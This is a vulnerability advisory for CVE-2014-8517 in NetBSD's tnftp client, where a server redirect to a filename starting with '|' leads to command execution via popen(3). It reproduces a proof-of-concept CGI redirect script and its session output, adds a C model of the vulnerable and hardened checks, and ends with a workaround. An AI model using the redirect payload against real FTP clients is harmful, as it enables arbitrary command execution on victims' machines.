Arbitrary Command Execution Vulnerability in tnftp ftp client (CVE-2014-8517)
Release date:
Updated on:
Affected Systems:
NetBSD tnftp
Description:
CVE (CAN) ID: CVE-2014-8517
tnftp is NetBSD's FTP client and is also shipped by many other systems.
tnftp contains a vulnerability that allows a malicious server to execute arbitrary commands on the client. It affects multiple systems that ship tnftp, including Linux distributions (Fedora, Debian), the BSDs (NetBSD, FreeBSD, OpenBSD) and Apple OS X Yosemite 10.10.
When the victim runs "ftp http://server/path/file.txt" without using the "-o" option to specify an output file, tnftp derives the output filename from the last URL it fetched (it follows HTTP redirects), and a filename beginning with "|" is passed to popen(3). A malicious server, or any server a redirect leads to, can therefore make tnftp run a command of its choosing.
Source: Jared McNeill
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk.
Jared McNeill provides the following test method:
If you do "ftp http://server/path/file.txt" and don't specify an output filename with -o, the ftp program can be tricked into executing arbitrary commands.

The FTP client will follow HTTP redirects, and uses the part of the path after the last "/" from the last resource it accesses as the output filename (as long as -o is not specified).

After it resolves the output filename, it checks to see if the output filename begins with a "|", and if so, passes the rest to popen(3): http://nxr.netbsd.org/xref/src/usr.bin/ftp/fetch.c#1156

Here's a simple CGI script that causes ftp to execute "uname -a". Issue is present on both NetBSD 7.99.1 and OSX 10.10:
a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x  1 root  wheel  159 Oct 14 redirect
-rwxr-xr-x  1 root  wheel  178 Oct 14 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
32        101.46 KiB/s
32 bytes retrieved in (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
a20$
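The decision the post above points at (the resolved output name is checked for a leading "|" and, if present, the rest is handed to popen(3), while the name itself comes from the final URL after redirects whenever -o is absent) can be modelled outside tnftp. The C program below is an added illustration written for this page; it is not tnftp's fetch.c and not the upstream fix. It derives the default output name the way the post describes, percent-decodes it, and compares the pre-fix decision with a hardened variant that treats a leading "|" as a pipe only when the name was typed by the user after -o (tnftp's -o documents that "|command" form, which is why the check exists at all) and refuses a server-derived name that begins with "|". The URLs are constructed inputs and the "refuse rather than create a file" policy is a design choice of this example.

```c
#include <stdio.h>
#include <string.h>

/* Added example modelling tnftp's output-name decision for CVE-2014-8517.
 * Not tnftp's own code; the refuse policy in hardened_is_pipe() and the
 * sample URLs are assumptions made for illustration. */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode src into dst ("%20" -> ' '). Returns 0 on success, -1 if
 * an escape is malformed (e.g. "%2" or "%zz") or dst is too small. */
int url_decode(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    if (dstlen == 0)
        return -1;
    for (const char *p = src; *p != '\0'; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {
            int hi = hexval((unsigned char)p[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)p[2]);
            if (lo < 0)
                return -1;      /* malformed escape: do not guess */
            c = hi * 16 + lo;
            p += 2;
        }
        if (o + 1 >= dstlen)
            return -1;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return 0;
}

/* Default output name as the post describes it: the part of the last
 * fetched URL after the final '/', percent-decoded. Returns -1 if the URL
 * has no file component or decoding fails. */
int derived_outfile(const char *final_url, char *dst, size_t dstlen)
{
    const char *path = strstr(final_url, "://");
    path = path != NULL ? path + 3 : final_url;   /* skip "scheme://" */
    const char *slash = strrchr(path, '/');
    if (slash == NULL || slash[1] == '\0')
        return -1;
    return url_decode(slash + 1, dst, dstlen);
}

static int copy_user_name(const char *user_outfile, char *dst, size_t dstlen)
{
    if (strlen(user_outfile) + 1 > dstlen)
        return -1;
    strcpy(dst, user_outfile);
    return 0;
}

/* Pre-fix decision: 1 = name goes to popen(3), 0 = opened as a file,
 * -1 = error. A leading '|' is honoured wherever the name came from, so a
 * redirect to ".../|uname%20-a" ends in popen("uname -a"). */
int vulnerable_is_pipe(const char *user_outfile, const char *final_url,
                       char *resolved, size_t n)
{
    int rc = user_outfile != NULL
        ? copy_user_name(user_outfile, resolved, n)
        : derived_outfile(final_url, resolved, n);
    if (rc != 0)
        return -1;
    return resolved[0] == '|';
}

/* Hardened decision (the principle, not the upstream diff): only a name the
 * user typed after -o may be a pipe. A server-derived name never reaches
 * popen(3); one beginning with '|' is refused instead of silently creating
 * a file literally called "|uname -a". */
int hardened_is_pipe(const char *user_outfile, const char *final_url,
                     char *resolved, size_t n)
{
    if (user_outfile != NULL) {
        if (copy_user_name(user_outfile, resolved, n) != 0)
            return -1;
        return resolved[0] == '|';      /* explicit user intent */
    }
    if (derived_outfile(final_url, resolved, n) != 0)
        return -1;
    return resolved[0] == '|' ? -1 : 0;
}

int main(void)
{
    /* Constructed inputs mirroring the post's redirect target. */
    const char *redirected = "http://192.168.2.19/cgi-bin/|uname%20-a";
    char name[256];

    printf("no -o, redirected: pre-fix=%d",
           vulnerable_is_pipe(NULL, redirected, name, sizeof name));
    printf(" name=\"%s\"\n", name);
    printf("no -o, redirected: hardened=%d\n",
           hardened_is_pipe(NULL, redirected, name, sizeof name));
    printf("-o out.txt, redirected: pre-fix=%d\n",
           vulnerable_is_pipe("out.txt", redirected, name, sizeof name));
    printf("-o '|cat': hardened=%d (user asked for a pipe)\n",
           hardened_is_pipe("|cat", "http://server/path/file.txt",
                            name, sizeof name));
    return 0;
}
```

Compile with any C99 compiler (e.g. cc -std=c99 -Wall) and run it; the first two lines of output show the same redirected URL being a popen(3) target before the fix and a refused name after it, which is exactly the difference between the session above and a patched client. Passing -o with a name of your own, even against the malicious redirect, keeps both variants on the file path.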
Suggestion:
Vendor patch:
NetBSD
------
At the time of writing the vendor had not provided a patch or upgrade. Users of the software should follow the vendor's homepage to obtain the latest version:
http://ftp.netbsd.org/pub/pkgsrc/current/pkgsrc/net/tnftp/README.html
Workaround: until a fixed version is installed, always pass an explicit output filename with -o (one that does not begin with "|") when fetching URLs with ftp(1), since the vulnerability only triggers when the output name is derived from the server-controlled URL; avoid fetching from untrusted servers, bearing in mind that any server can redirect the client to another.
Refer:
http://seclists.org/oss-sec/2014/q4/459
http://seclists.org/oss-sec/2014/q4/460
http://netbsd.org/